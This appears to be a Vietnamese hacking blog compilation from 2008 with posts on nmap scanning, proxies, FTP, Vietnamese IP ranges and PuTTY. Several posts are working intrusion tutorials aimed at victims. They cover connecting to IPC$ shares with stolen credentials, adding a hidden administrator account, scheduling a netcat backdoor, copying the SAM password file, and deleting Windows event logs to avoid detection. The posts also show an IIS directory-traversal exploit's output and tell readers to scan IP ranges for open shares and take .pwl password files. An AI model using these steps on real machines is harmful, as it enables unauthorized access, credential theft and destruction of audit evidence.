Muc dich: Tuong tu nhu quet Port, nhung quet Indent se cho ban biet duoc cac Service nay thuoc quyen so huu, quyen han cua ai…Thuong duoc dung tren cac OS Unix/BSD/Solaris/Linux/AIX/HP-UX…
nmap -sS -I www.target.com
Starting nmap V 2.53 by Fyodor (fyodor@dhp.com, www.insecure.com/nmap)
Interesting ports on (IP cua target.com).
Port State Protocol Service Owner
21 open TCP FTP Root
23 open TCP Telnet Root
25 open TCP SMTP Root
80 open TCP HTTP Root
4)Scan OS and Banner.
Muc dich: cho phep ta xac dinh xem target.com hien dang dung he OS gi, hoac xac dinh thong tin ve Software or Hardware cua cac thiet bi mang. VD de Scan OS ta dung lenh:
nmap -sS -O www.target.com
Starting nmap V 2.53 by Fyodor (fyodor@dhp.com, www.insecure.com/nmap)
Interesting ports on (IP cua target.com).
Port State Protocol Service Owner
21 open TCP FTP Root
23 open TCP Telnet Root
25 open TCP SMTP Root
80 open TCP HTTP Root
TCP Sequence Prediction: Class=randoom positive increments Diffculty=
26590 (Worthy Challenge)
Remote operating system guess: Solaris x.x
Cac thong tin de nhan dien OS duoc chua trong file nmap-os-fingers, ban co the len Site cua Nmap de cap nhat cac dau hieu nhan dien OS moi.
Tuong tu ban co the chop Banner cua Firewall. Neu dinh chop Banner cua Firewall thi ban nen dung tuy chon quet SYN cho kin dao. Truoc het ban phai xac dinh vi tri cua Firewall:
Windows:
tracert www.target.com
Ban se thay danh sach cac Node phai di qua truoc khi den target.com, thong thuong thi cai Node sat Target.com chinh la Firewall…Toi khong chac, nhung ba co tu dung Nmap quet o che do TCP xem, neu no bao la Port bi khoa thi dung 90 % no la Firewall roi
1.attack-gw (192.168.50.1)
2.gw1-isp (202.65.45.1)
2.gw2-isp (202.65.45.2)
…
7.gwrouter-isp (202.65.45.67)
8.target.com (202.65.45.70)
Sau khi da xac dinh duoc Node 7.gwrouter-isp (202.65.45.1) la Firewall, muon chop Banner cua no ban dung lenh
nmap -sS -O 202.65.45.67
OK! Nmap con rat nhieu chuc nang nua ma toi chua kham pha ra het. Phan con lai de cac ban kham pha not. Noi chung Nmap la mot cong cu quet so mot cua cac Admin, Hacker, Security…Da^n sa`nh -die^.u ko the^? ko xai` Nmap.
Best Wishes
N.X.Bi O==((=========> ^($)^
Moderator Of HKC
——————————————————————————-
Download Nmap (free)
Nmap for Unix – http://www.insecure.org/nmap/
Nmap for NT – http://www.eeye.com/html/Databases/Software/nmapnt.html
==========================
Binhnx – Security Soluitons
www.security.com.vn
Sử dụng Proxy
11 Tháng 6 2008 Để lại phản hồi
in Basic Hacking Thẻ:fake, ip, proxy
Các bạn đôi khi vào Web và không vào được do bị fire wall hoặc server cấm không cho ip việt nam vào, vậy phải làm sao? Rất đơn giản, mình sẽ hướng dẫn bạn khắc phục:
Proxy list các bạn có thể tìm ở đây:
http://www.samair.ru/proxy/fresh-proxy-list.htm
http://www.samair.ru/proxy/index.htm
http://www.multiproxy.org/anon_proxy.htm
Và để check IP hiện thời của bạn xin mời vào:
http://ìp2location.com
Bây giờ là cách thực hiện:
Trên trình duyệt Web các bạn chọn Tools —> chọn Internet Options.. —> Chọn Tab Conections —> sau đó chọn LAN Settings..
Lần lượt chọn các thông tin sau:
Proxy server
Nhập IP và Port để proxy vào đây!
Sau đó chọn thêm Bypass proxy ….
Ok để xác lập
Nếu thực hiện đúng thì khi bạn test no sẽ báo bạn đang ở quốc gia có ip mà bạn dang đùng để proxy, và bây giờ bạn có thể lướt Web được rồi đó!
CÁC LỆNH CƠ BẢN XÂM NHẬP MÁY TÍNH
11 Tháng 6 2008 1 phản hồi
thực ra thí tớ thấy viết những bài này tốt hơn là viết những bài hacking không tài nào thực hiện thành công….nhưng đây chỉ là suy nghỉ của tớ…ai cũng có khiếu điểm mà ?
Phần 1 : Net
chỉ cần bạn có được User và Passwords của một IP nào trên Net…thế là bồ có thể kết nói một IPC$ rồi đấy….
bây giờ tớ xin ví dụ là bạn có được User la hbx và passwords : 123456…IP : 127.0.0.1
cậu hãy mở trình Ms dos và gõ vào lệnh sau :
Net use :để xem các kết nối
Net use \\127.0.0.1\ipc$ “123456″ /user:hbx để kết nồi một IPC$ với máy victtim
Net use \\ip\ipc$ “password” /user:username
nhưng thao tác tiếp theo..bạn nhất thiết phải login xong mới có thể sử dũng
Net use \\11.11.22.22 /delete ( b? k?t n?i )
———————————————————————————————–
Net user: xem các user trên máy
bây giờ chúng ta nói tiếp làm thế nào để tạo một user mới nghe…
Net user username pass /add ( thêm 1 user mới)
Vd: Chúng ta cộng thệm môt user mới là alex và password 123456
Net user alex 123456 / add
Net user alex 654321 (đổi pass thành 654321)
—————————————————————————————————-
Net localgroup : xem các group trong máy
nếu bạn thành công..thì có thể cộng user này vào nhom Adminstrator
Net localgroup Adminstrator alex /add
—————————————————————————————————-
Ttrong phần này tớ hướng dẫn tạo một ổ đỉa Ảo trên computer
Net use z: \\127.0.0.1\C$ ( hoặc là IPC$ )
Z là của mình…còn C$ là của Victim
——————————————————————————————————-
Phần 2 : AT
thông thường thì khi độp nhập vào máy tính..chúng ta sẻ tặng quà lưu niệm cho victim trước khi rút lui,….vậy khi copy trojan lên máy rồi…làm thế nào dể khới động nó đây ?
chúng ta phải dùng đến lệnh AT thôi…..
đầu tiên…chúng ta cần biết thời gian của đối phương
Net time \\127.0.0.1
bây giờ thì nó sẽ phản hồi thời gian của victim…vd : 12:0 ..
tiếp theo..chúng ta cần tạo môt homework ID = 1
AT \\127.0.0.1 12:3 nc.exe
ở đây giả thiết là tui có con trojan la Nc.exe và đã được copy lên máy victim rồi
* giới thiệu chút it về NC…NC là từ viết tắc của NETCAT….nó là một telnet server với port 99
đợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99..thế là xong phần lưu bút
———————————————————————————————————
Phần 3 : Telnet
đây là một lệnh rất cần thiết khi xâm nhập máy tính…nó có thể kết nối vớ máy tính khắc từ xa..nhưng thường thi phải có I D & PW..nhưng nếu máy đã Ăn Đạn rồi thì bạn chỉ cần connected đến port 99 là ok
Telnet 127.0.0.1 99
thế là bồ đã kết nối đến port 99 và có thể thực hiện tất cả các lệnh…
———————————————————————————————————–
Phần 4 : Copy
bây giờ chúng ta nói tiêp…làm thế nào để copy files trên máy mình lên máy victim và làm ngược lại….nhưng bạn phải có kết nối IPC$ cái đã….
chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1
Copy Index.html \\127.0.0.1\C$\index.html
nếu bạn copy lên folder winNt
Copy index.html \\127.0.0.1\admin$\index.html
admin$ = c:\winnt\system32
muốn copy files trên máy victm thì bạn gõ vào :
Copy \\127.0.0.1\Admin$\repair\sam._c:\
————————————————————————————————
Phần 5 : Set
nếu bạn muốn hack một website……tất nhiến là phải mở port 80..nếu không thì cậu hack cho ai xem ?
đã tới lúc dùng lệnh Set rồi
sau đây là kết quả mà tớ tìm thấy……chúng ta phân tích nghe….chủ yếu là muốn biêt homepage nó ở đâu thôi…..
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= DAY LA SO IP CUA TUI..NHUNG TUI DEL ROIHTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot DAY LA URL CUA HOMEPAGE, CHI CAN NHIN SAU DONG PATH_TRANSLATED= LA BIET NO O DAU 。O DAY LA E:\vlroot PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
đây là cách khá ngu..nhưng chỉ có cách này mới 100% biết đuợc homepage tên gì..ở ảâ ? khi cậu Dir ..chắc chắn là sẽ View được rất nhiều files đấy`…..
—————————————————————————————
phần 6 : Nbtstat
nếu cậu Scan đuợc một máy sữ dụng Winnt…open port 135-139…thế thì bồ phải dùng lệnh này để biết thêm user thôi…
* tiện thể xin nói luôn…đây là netbios….sau khi có user rồi bạn có thể đoán mò password..nếu không thi Cracking luôn đi
Nbtstat – A XXX.XXX.XXX.XXX
sau đây là kết quả tớ scan được…..
NetBIOS Remote Machine Name Table
Name Type Status
———————————————
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII…<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
kết quả cho biết User là PENTIUMII。
——————————————————————————————-
Phần 7 : Shutdown
nhìn lệnh thôi cũng đủ biết rồi phải hông ? đây là lệnh shutdown server Winnt
Shutdown \\127.0.0.1 t:20
20 giây sau…Winnt sẽ tự khời động lại…….hi vọng các bạn suy nghỉ kỷ trước khi dùng lệnh này….vì nó sẽ làm tổn thất rất nặng cho victim…hãy làm tay hacker có đạo đức
———————————————————————————————————————————
Phần 8 : Dir….
lệnh này không có gì để nói hết..chỉ dùng để view thôi……………..
———————————————————————————————–
Phần 9 : Del
lệnh này giống như xoá nhật ký vậy đó…..khi chúng ta xâm nhập máy tình…trên hệ thống sẽ lưu lại thông tin của chúng ta..vì thế..nên del nó đi…chư muốn bị tóm cổ hả ?
sau đây là những files nhật ký của Winnt
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
chỉ cần del hết là coi như xong
——————————————————————————————————————-
Những lệnh trong ms dos còn rất nhiều….như lệnh ECHO …..FTP………ATTRIB…….nhưng vì còn nhiều lắm…tớ không tài nào đề cập hết trong một bài…mong các bạn hiểu cho và thông cảm nghe……
Bài viết cua? Venom
Xâm nhập từ xa khi online
11 Tháng 6 2008 1 phản hồi
Thông thường một hacker trước khi xâm nhập máy tính, thường cố gắng cài một Trojan mở cổng để xâm nhập, nổi tiếng nhất là Trojan Back orffice.
Bài học này sẽ chỉ cho bạn làm thế nào có thể kết nối với một máy tính cài Windows thông qua Internet và có thể lấy thông tin của chúng.
Công cụ cần thiết :
Ðầu tiên là bạn cần là một chương trình scan gọi là Netbios scaner. Tôi dùng Legion hoặc Winhackgold ( Download ở http://www.hackerclub.com/ ). Chương trình sẽ scan tất cả các máy có mở chia sẻ file trên cùng một netbios.
Bắt đầu :
Sau khi kết nối vào mạng, bạn vào Start/Run rồi đánh winipcfg, bạn sẽ nhận được một địa chỉ IP mà ISP gán cho bạn mỗi khi bạn kết nối, nếu bạn kết nối bằng Modem thì số IP này sẽ thay đổi gọi là IP động.
Trong mục SCAN FROM của Legion bạn hãy đánh địa chỉ IP của mình vào. Ví dụ tôi có 203.160.11.48 thì tôi đánh trong Legion on là 203.160.11 thôi. Bây giờ ở mục TO của Legion bạn đánh 203.160.xx (xx là địa chỉ IP bất kì bạn đánh vào, bạn nên đánh số gần nhất với IP của mình, tôi chọn số 12).
Bây giờ ấn nút SCAN, Legion sẽ bắt đầu scan và cho tất cả các địa chỉ IP nó tìm thấy 1 – 254. Nếu bạn may mắn thì khi chọn một địa chỉ IP thì bạn sẽ nhìn thấy như sau :
Shared resources at \\206.11.11.42
Sharename Type Comment
———————————————-
A Disk Floppy
CDRIVE Disk C:\ Drive
DDRIVE Disk D:\ Drive
CDROM Disk CD-Rom Read Only
The command was completed successfully.
Hãy click vào địa chỉ IP đó với các lệnh của USE NET bạn sẽ có quyền kiểm soát địa chỉ IP đó.
Trong cửa sổ DOS-Promt bạn hãy sử dụng các lệnh sau:
NET USE [drive: | *] [\\computer\directory [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE [port:] [\\computer\printer [password | ?]]
[/SAVEPW:NO] [/YES] [/NO]
NET USE drive: | \\computer\directory /DELETE [/YES]
NET USE port: | \\computer\printer /DELETE [/YES]
NET USE * /DELETE [/YES]
NET USE drive: | * /HOME
drive Specifies the drive letter you assign to a
shared directory.
* Specifies the next available drive letter.
If used with /DELETE, specifies to
disconnect all of your connections.
port Specifies the parallel (LPT) port name you
assign to a shared printer.
computer Specifies the name of the computer sharing
the resource.
directory Specifies the name of the shared directory.
printer Specifies the name of the shared printer.
password Specifies the password for the shared
resource, if any.
? Specifies that you want to be prompted for the
password of the shared resource. You don’t
need to use this option unless the password is
optional.
/SAVEPW:NO Specifies that the password you type
should not be saved in your password-list
file. You need to retype the password the
next time you connect to this resource.
/YES Carries out the NET USE command without
first prompting you to provide information or
confirm actions.
/DELETE Breaks the specified connection to a shared
resource.
/NO Carries out the NET USE command, responding
with NO automatically when you are prompted
to confirm actions.
/HOME Makes a connection to your HOME directory if
one is specified in your LAN Manager or
Windows NT user account.
To list all of your connections, type NET USE without
options.
To see this information one screen at a time, type the
following at the command prompt:
NET USE /? | MORE
or
NET HELP USE | MORE
Sau khi xâm nhập bạn cần lấy các thông tin của IP này ! Hãy vào những cái có kiểu \program files\cutètp\tree.dat, \mirc\download, windows\*.pwl …
Chuc các bạn thành công.
Nếu các bạn gặp khó về tool thì hãy liên hệ với mình, mình sẽ send tool mới cho.
Các lệnh cơ bản của FTP
11 Tháng 6 2008 Để lại phản hồi
Giới thiệu
FTP là chữ viết tắc của File Transfer Protocol - Giao thức truyền file. FTP là một giao thức truyền file trên mạng dựa trên chuẩn TCP nên rất đáng tin cậy!
Một số lệnh phổ biến của FTP
Sau đây là danh sách một số lệnh thường dùng kèm theo hướng dẫn mà bạn cần biết!
ascii chuyển sang chế độ truyền file theo dạng văn bản
binary chuyển sang chế độ truyền file theo dạng nhị phân
cd [directory] chuyển vào thư mục directory
cdup chuyển lên thư mục cấp trên một cấp
close ngắt kết nối với máy chủ
del [remote-file] xóa 1 file trên máy chủ
dir [remote-directory|file] liệt kê nội dung của thư mục hoặc danh sách các file trên máy chủ
help [command] cho biết hướng dẫn về lệnh command
lcd [local-directory] đặt lại thư mục làm việc trên client là local-directory
ls [remote-directory|file] [-la] liệt kê nội dung của thư mục hoặc danh sách các file trên máy chủ; tham số -la sẽ liệt kê tất cả có kèm theo mô tả về quyền
mdelete [remote-files] xóa nhiều file trên máy chủ
mget [remote-files] download các files trên máy chủ về
mkdir tạo thư mục có tên directory-name
mput [local-files] upload các files lên máy chủ
open host [port] kết nối đến máy chủ FTP có hostname là host và đang chạy dịch vụ FTP ở cổng port
put [remote-file] upload local-file lên máy chủ với tên mới là remote-file nếu được
pwd cho biết thư mục đang làm việc hiện thời
quit thoát
recv [local-file] nhận remote-file trên máy chủ và lưu trên máy tính với tên local-file nếu được
rename [from] [to] đổi tên file hoặc thư mục from thành to
rmdir directory-name xóa thư mục có tên directory-name
send local-file [remote-file] gởi local-file từ máy tính lên máy chủ với tên mới là remote-file nếu được
status cho biết trạng thái của phiên làm việc hiện tại
syst cho biết hệ điều hành của máy chủ
user user-name [password] [account] login vào với tên là user-name, mật khẩu là password, tài khoản là account
? gọi hướng dẫn
Các ví dụ
Để dễ hiểu, các bạn hãy xem các ví dụ sau:(tôi sử dụng các này để upload mấy file lên website đó, không cần dùng các chương trình FTP mạnh như WS_FTP Pro, FTPNet, CuteFTP, AbsoluteFTP, …!) Tôi lưu trang web cần tải lên server trong c:\website! Bây giờ tôi sẽ tải nó lên!
C:\website>ftp myftpsrv // kết nối đến máy chủ myftpsrv
Connected to myftpsrv.
User (ftpsrv:(none)): dt
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> pwd // cho biết thư mục hiện tại đang làm việc!
257 “/home/dt” is current directory.
ftp> status // xem trạng thái hiện tại
Type: ascii; Verbose: On ; Bell: Off ; Prompting: On ; Globbing: On
Debugging: Off ; Hash mark printing: Off . // ascii=1
ftp> cd www // chuyển vào thư mục www
250 Directory changed to /home/dt/www
ftp> put index.html // upload file index.html lên server
200 PORT Command successful.
150 Opening ASCII mode data connection for index.html.
226 Transfer complete.
ftp: 2095 bytes sent in 0.00Seconds 2095000.00Kbytes/sec.
ftp> mkdir tools // tạo thư mục /home/dt/www/tools
257 “/home/dt/www/tools” directory created.
ftp> cd tools // chuyển vào thư mục tools
250 Directory changed to /home/dt/www/tools
ftp> lcd c:\website\tools // thay đổi lại local directory = c:\website\tools
Local directory now C:\website\tools.
ftp> bin // chuyển sang chế độ truyền file nhị phân
200 Type set to I.
ftp> mput *.* // upload tất cả các file trong c:\website\tools lên server, vào /home/www/tools/
mput test.zip? y
200 PORT Command successful.
150 Opening BINARY mode data connection for test.zip.
226 Transfer complete.
ftp: 10168 bytes sent in 0.06Seconds 169.47Kbytes/sec.
mput test.exe? y
200 PORT Command successful.
150 Opening BINARY mode data connection for test.exe.
226 Transfer complete.
ftp: 54625 bytes sent in 0.11Seconds 496.59Kbytes/sec.
ftp> ls -la // liệt kê nội dung của /home/www/tools
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drwxr–r– 1 dt group 0 Sep 30 14:13 .
drwxr–r– 1 dt group 0 Sep 30 14:13 ..
-rwxr–r– 1 dt group 54625 Sep 30 14:14 test.exe
-rwxr–r– 1 dt group 10168 Sep 30 14:14 test.zip
226 Transfer complete.
ftp: 247 bytes received in 0.00Seconds 247000.00Kbytes/sec.
ftp> del test.exe // tôi lỡ tay upload lên file test.exe, bây giờ tôi cần phải xóa nó
250 DELE command successful.
ftp> cd .. // chuyển lên thư mục cấp trên
250 Directory changed to /home/dt/www
ftp> mkdir cgi-bin2 // tạo thư mục mới
257 “/home/dt/www/cgi-bin2″ directory created.
ftp> rename cgi-bin2 cgi-bin // tôi đã nhập vào sai mất rồi, bây giờ phải đổi tên lại thôi!
350 File or directory exists, ready for destination name
250 RNTO command successful.
ftp> cd cgi-bin // chuyển vào thư mục cgi-bin
250 Directory changed to /home/dt/www/cgi-bin
ftp> lcd c:\website\cgi-bin // đặt lại local directory!
Local directory now C:\website\cgi-bin.
ftp> ascii // chuyển sang chế độ truyền file văn bản vì tôi cần upload một số file .cgi + .pl
200 Type set to A.
ftp> put test.cgi // upload file test.cgi
200 PORT Command successful.
150 Opening ASCII mode data connection for test.cgi.
226 Transfer complete.
ftp: 222 bytes sent in 0.00Seconds 222000.00Kbytes/sec.
ftp> ls -la // xem nội dung của /home/www/cgi-bin
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drwxr–r– 1 dt group 0 Sep 30 14:16 .
drwxr–r– 1 dt group 0 Sep 30 14:16 ..
-rwxr–r– 1 dt group 222 Sep 30 14:17 test.cgi
226 Transfer complete.
ftp: 182 bytes received in 0.00Seconds 182000.00Kbytes/sec.
ftp> site chmod 755 test.cgi // đặt quyền 755(wrxx-xr-x) cho file test.cgi
ftp> ls -la // tôi liệt kê lại thư mục cgi một lần nữa
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 dt group 0 Sep 30 14:16 .
drwxr-xr-x 1 dt group 0 Sep 30 14:16 ..
-rwxr-xr-x 1 dt group 222 Sep 30 14:17 test.cgi
226 Transfer complete.
ftp: 182 bytes received in 0.00Seconds 182000.00Kbytes/sec.
ftp> bye // tất cả đã xong, bây giờ tôi có thể ngắt kết nối được rồi!
221 Goodbye!
C:\website>
Hi vọng là bạn hiểu được ví dụ trên!
Nói thêm về FTP
Làm thế nào để kết nối với một máy chủ FTP qua một proxy-server, chẳng hạn như Wingate? Chỉ cần ftp đến proxy-server này và gõ vào như dạng sau, user@host[:port]. Ví dụ máy tôi đang chạy Wingate-FTP ở cổng 21 và Serv-U FTP-Server v2.5i ở cổng 2121, tôi có thể kết nối đến Serv-U FTP-Server v2.5i qua Wingate-FTP như sau:
C:\>ftp localhost
Connected to dt.
220 WinGate Engine FTP Gateway ready
User (dt:(none)): dt@localhost:2121
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp>
Okay, bây giờ tôi upload và download file như bình thường được rồi!
Hack với FTP
Đôi khi FTP cũng cho biết một số thông tin rất quan trọng! Bạn dễ dàng đoán được hệ điều hành của máy chủ FTP! Hãy xem các ví dụ sau:
C:\>ftp localhost
Connected to dt.
220 dt Microsoft FTP Service (Version 1.0).
User (dt:(none)): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Windows 95 FTP Service.
230 Anonymous user logged in as anonymous.
Yeah! Chắc ăn là server này là PWS chạy trên Windows!
Nếu như admin vô hiệu hóa dòng quảng cáo trên thì sao!? Vẫn còn cách khác! Bạn login vào và phát lệnh syst như sau:
ftp> literal syst
215 Windows_NT version 4.10
Hình như hệ điều hành của máy chủ là Win9.x hoặc WinNT thì phải!
(Nếu bạn đang chạy Linux* thì chỉ cần gõ syst).
IP Việt Nam
11 Tháng 6 2008 Để lại phản hồi
* 203.160.0.0 – 203.160.1.255 (IOITHANOI-VN) Institute of Information Technology; Nghia Do; Tu Liem; Hanoi; VN
* 203.161.0.0 – 203.161.0.255 (CESTI-NTS-1) CESTI/NTS; c/o ag@tm.is; VN
* 203.161.0.0 – 203.161.3.255 (CESTINTS-VN) Center for Science and Technology Information; 79 Truong Dinh Street, Dist. 1, Hochiminh City; VN
* 203.162.0.0 – 203.162.4.255 (VNN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du street, Hanoi; Vietnam; VN
* 203.162.0.0 – 203.162.7.255 (VDC-VN) Vietnam Posts and Telecom General Company; Vietnam Data Communication Company; Hanoi; VN
* 203.162.5.8 – 203.162.5.23 (CINET) Culture Information Network; 51-53 NgoQuyen street, Hanoi; Vietnam; VN
* 203.162.5.24 – 203.162.5.31 (PHUONGNAMNET) Vietnam Exhibition and Fair Centre; Giang Vo street, Hanoi; Vietnam; VN
* 203.162.5.32 – 203.162.5.39 (SAIGONNET) Saigon Posts and Telecommunications Corporation (SPT); 45 LeDuan street, District I, Hochiminh city; Vietnam; VN
* 203.162.5.40 – 203.162.5.47 (VNN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du street, Hanoi; Vietnam; VN
* 203.162.5.48 – 203.162.5.55 (CINET) Culture Information Network; 51-53 NgoQuyen street, Hanoi; Vietnam; VN
* 203.162.5.56 – 203.162.5.63 (ZUELLIGPHARMANET) 105-107 Nguyen Cong Tru street, District1, Hochiminh city; Vietnam; VN
* 203.162.5.64 – 203.162.5.71 (VNN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du street, Hanoi; Vietnam; VN
* 203.162.5.104 – 203.162.5.135 (VNANET) Vietnam News Agency; 5 Ly Thuong Kiet street, Hanoi; Vietnam; VN
* 203.162.5.136 – 203.162.5.183 (VNN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du street, Hanoi; Vietnam; VN
* 203.162.5.184 – 203.162.5.199 (REFER) French language Community (AUPEULF); Hanoi University; 21 Le Thanh Ton street, Hanoi; VN
* 203.162.5.200 – 203.162.5.215 (ITNET) National Informatic Technology Program; 14 Le Hong Phong street, Hanoi; Vietnam; VN
* 203.162.5.216 – 203.162.5.231 (VISTA) National Center for Sciencific and Technological; Information and Documentation; 24 Ly Thuong Kiet street, Hanoi; VN
* 203.162.5.232 – 203.162.5.239 (VNN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du street, Hanoi; Vietnam; VN
* 203.162.5.240 – 203.162.5.247 (UNDP) United Nation Development Program; 25-29 Phan Boi Chau street, Hanoi; Vietnam; VN
* 203.162.6.32 – 203.162.6.63 (VNN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du street, Hanoi; Vietnam; VN
* 203.162.6.64 – 203.162.6.95 (NETNAM) Computer Network System Department,; Institution Of Information Technology (IOIT); Hoang Quoc Viet street, Hanoi; Vietnam; VN
* 203.162.6.96 – 203.162.6.127 (SAIGONNET) Saigon Posts and Telecommunications Corporation (SPT); 45 LeDuan street, District I, Hochiminh city; Vietnam; VN
* 203.162.6.128 – 203.162.6.159 (NHANDANNET) Nhandan Newspaper; 71 Hang Trong street,; Hanoi; VN
* 203.162.6.160 – 203.162.6.223 (VNN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du street, Hanoi; Vietnam; VN
* 203.162.7.32 – 203.162.7.63 (FPTNET) Corporation for Financing and Promoting Technology; 75 Tran Hung Dao street, Hoan Kiem District; Hanoi, Vietnam; VN
* 203.162.7.64 – 203.162.7.95 (NETNAM) Computer Network System Department,; Institution Of Information Technology (IOIT); Hoang Quoc Viet street, Hanoi; Vietnam; VN
* 203.162.7.96 – 203.162.7.191 (FPTNET) Corporation for Financing and Promoting Technology; 75 Tran Hung Dao street, Hoan Kiem District, Hanoi; Vietnam; VN
* 203.162.8.0 – 203.162.15.255 (VNN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du, Hanoi; Vietnam; VN
* 203.162.16.0 – 203.162.63.255 (VNN-VN) Vietnam Posts and Telecommunications (VNPT); 18 Nguyen Du, Hanoi; Vietnam; VN
Hướng dẫn sử dụng Putty
11 Tháng 6 2008 1 phản hồi
Ở đây tôi xin trình bày cách sử dụng putty để các bạn tham khảo thêm:
1. Tải về và cài đặt putty để sử dụng
2. Chạy file putty.exe
3. Một hộp hội thoại sẽ được mở ra. Ở đó bạn sẽ điền thông tin về host name và xin hãy gõ vào đó như sau: m-net.arbornet.org sau đó bấn vào chỗ lựa chọn có chữ Telnet
4. Hệ thống sẽ cung cấp cho chúng ta dấu nhắc của Telnet.
5. Bạn sẽ nhìn thấy ô login: tại dấu nhắc đó bạn gõ vào newuser
6. Hãy đọc các điều khoản được cung cấp và gõ vào Enter cho đến khi có dấu nhắc. Và bấm vào phím xoá lùi (backspace)
7. Bấm vào phím backspace
8. Nhập vào tên login (nhập vào tên mà bạn thích)
9. Hãy chờ đợi cho tới khi có dấu nhắc: sau đó bạn thực thi những gì bạn muốn
đánh vào thực đơn và gõ Enter
10. Hãy gõ và các tiền tố và gõ Enter
11. Nhập vào các thông tin cá nhân nếu bạn muốn
12. Tài khoản của bạn sẽ được khởi tạo, sau đó hệ thống sẽ yêu cầu bạn nhập vào mật khẩu cho lần kế tiếp
13. Tiếp tục và log in vào
14. Bây giờ bạn đã có thể kết nối vào một hệ thông của UNIX với một shell. Để chứng thực điều đó, tại nơi đó bạn có thể chat, chơi trò chơi, bàn bạc, gửi mail, .. đấy là bước đầu tiên chú bé hướng dẫn các bạn cách sử dụng Telnet với putty (Để biết về Telnet mong các bạn tự tìm hiểu thêm)
Bây giờ chúng ta sẽ nghiên cứu sâu thêm một chút
Telnet luôn đặt ngầm định với cổng 23 (Để xem chi tiết về các cổng vào box lập trình bài hướng dẫn viết chương trình quét công có liệt kê đầy đủ các cổng và chương trình) do vậy đại bộ phận các máy tính đều sử dụng Telnet chạy ở cổng 23. để tìm các cổng mở bạn có thể dùng chương trình quét IP để tìm cổng mở trên các máy chủ. Bạn hãy thử telnet đến nó trước sau đó sử dụng với putty:
1. Host: <nhập vào địa chỉ IP>
2. Và bạn cũng đừng quên chuyển sang chỗ lựa chon có chứa chữ Telnet đấy nhé
3. Hạy bấm vào nút open ở bên dưới để kết nối
4. Và bây giờ bạn hãy sử dụng tên và mật khẩu đã được tạo ở trên
5. Hãy cố gắng thử với những câu lệnh cơ bản
6. Công việc kết nối giứa các máy tính đã được hoàn thành
7. Bây giờ chính là lúc bạn có thể thực hành với các câu lệnh cơ bản của Linux và Unix !!!
Ví dụ một vài lệnh sau đây
CD – dùng đển vào ra thư mục. Cú pháp: CD <tên thư mục>
LS – Liệt kê tất cả các file và thư mục hiện thời
PWD – Hiển thị thư mục đang làm việc
FIND – Câu lệnh dùng để tìm kiếm
LOGOUT – đóng kết nối tới máy chủ
QUIT – dùng để thoát khỏi Telnet
STATUS – hiện thị các thông tin của phiên giao dịch hiện thời
Để tìm hiểu được kỹ các câu lệnh của LINUX và UNIX chú bé thường sử dụng cái nè: Man, info, .. các bạn cũng thử dùng xem cũng rất có hiệu quả đấy !
(Để biết thêm về các câu lệnh cơ bản của Linux xem thêm ở trang của bác Lê Hoàn hoặc lúc nào rảnh chú bé sẽ gửi lên cho .. nhiều wé chỉ sợ không dùng để làm gì .. hic hic ..)
Telnet tới một cổng khác công thiết lập ngầm định
Oh kê .. Như các bạn đã biết là Telnet luôn thiết lập công ngầm định là 23 nhưng giả sử bạn bạn mốn telnet tới cổng 25 (cổng SMTP) thì điều này có thể làm được không? câu trả lời là hoàn toàn được !
Cho mình hỏi một câu nhé các bạn đã biết được những gì về cổng 23? và sử dụng các giao thức ..?? Nói chung mọi điều đều rất khó có phải không? Thôi quay trở lại vấn đề:
